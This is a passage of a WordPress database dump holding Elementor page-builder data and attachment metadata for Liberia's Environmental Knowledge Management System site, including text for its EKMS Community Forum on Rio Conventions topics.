\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.<\\/p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.<\\/p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <strong><span style=\\\"color: #ff6600;\\\">Please note that any inappropriate contents including topics\\/questions\\/comments\\/images\\/videos posted on the community forum, will be removed by the forum moderators.<\\/span><\\/strong><\\/p><p>If you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Join Us<\\/span>!<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(19881,2908,'_elementor_edit_mode','builder'),(19882,2908,'_elementor_template_type','wp-page'),(19883,2908,'_elementor_version','2.7.5'),(19884,2908,'_wp_page_template','default'),(19885,2908,'_elementor_data','[{\"id\":\"95f98b3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee80c4d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"968c8cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ea47e9d\",\"elType\":\"widget\",\"settings\":{\"title\":\"The EKMS Community Forum\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"69279a1f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"694b50b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2402f320\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9e3451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and\\/or topics of the Rio Conventions implementation in Liberia.<\\/p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics<span style=\\\"color: #3366ff;\\\"> <a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/feed\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Click here<\\/a><\\/span>.<\\/p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues\\/questions relating to the Rio Conventions implementation in Liberia.<\\/p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <span style=\\\"color: #339966;\\\"><strong>Please note that any inappropriate contents including topics\\/questions\\/comments\\/images\\/videos posted on the community forum, will be removed by the forum moderators.<\\/strong><\\/span><\\/p><p>If you are already a member of the EKMS community, please <span style=\\\"color: #3366ff;\\\"><a style=\\\"color: #3366ff;\\\" href=\\\"https:\\/\\/ekms-liberia.mn.co\\/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Sign In<\\/a><\\/span> or <a href=\\\"https:\\/\\/ekms-liberia.mn.co\\/?autojoin=1\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"color: #3366ff;\\\">Join Us<\\/span>!<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b86316\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63922e0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"290de68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b642c4\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(19886,2503,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:1;}}}}}'),(19889,2909,'_wp_attached_file','2019/11/featured_fda_program.jpg'),(19890,2909,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:554;s:4:\"file\";s:32:\"2019/11/featured_fda_program.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"featured_fda_program-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"featured_fda_program-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"featured_fda_program-768x416.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1575446197\";s:9:\"copyright\";s:14:\"Copyright 2009\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(19891,2910,'_wp_attached_file','2019/11/featured_training_photo.jpg'),(19892,2910,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:554;s:4:\"file\";s:35:\"2019/11/featured_training_photo.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"featured_training_photo-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"featured_training_photo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"featured_training_photo-768x416.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1575446076\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(19895,2801,'_thumbnail_id','2910'),(19900,2804,'_thumbnail_id','2909'),(19903,2911,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628520862;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3069;}i:1;a:1:{s:2:\"id\";i:3063;}i:2;a:1:{s:2:\"id\";i:3060;}}}}'),(19904,2911,'_edit_lock','1598613816:42'),(19906,2904,'_edit_lock','1575505726:1'),(19907,2904,'_edit_last','1'),(19908,2904,'ocean_sidebar','0'),(19909,2904,'ocean_second_sidebar','0'),(19910,2904,'ocean_disable_margins','enable'),(19911,2904,'ocean_display_top_bar','default'),(19912,2904,'ocean_display_header','default'),(19913,2904,'ocean_center_header_left_menu','0'),(19914,2904,'ocean_custom_header_template','0'),(19915,2904,'ocean_header_custom_menu','0'),(19916,2904,'ocean_menu_typo_font_family','0'),(19917,2904,'ocean_disable_title','default'),(19918,2904,'ocean_disable_heading','default'),(19919,2904,'ocean_disable_breadcrumbs','default'),(19920,2904,'ocean_display_footer_widgets','default'),(19921,2904,'ocean_display_footer_bottom','default'),(19922,2904,'ocean_custom_footer_template','0'),(19923,2904,'osh_disable_topbar_sticky','default'),(19924,2904,'osh_disable_header_sticky','default'),(19925,2904,'osh_sticky_header_style','default'),(19926,2904,'ocean_post_layout','full-width'),(19947,2922,'_wp_page_template','elementor_canvas'),(19948,2922,'_elementor_edit_mode','builder'),(19949,2922,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":70.292000000000001591615728102624416351318359375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.032000000000000028421709430404007434844970703125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free!\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19950,2922,'_elementor_version','2.7.5'),(19951,2922,'_elementor_template_type','wp-post'),(19954,2923,'_wp_page_template','elementor_canvas'),(19955,2923,'_elementor_edit_mode','builder'),(19956,2923,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":70.292000000000001591615728102624416351318359375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.032000000000000028421709430404007434844970703125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join Us to help grow the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free!\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\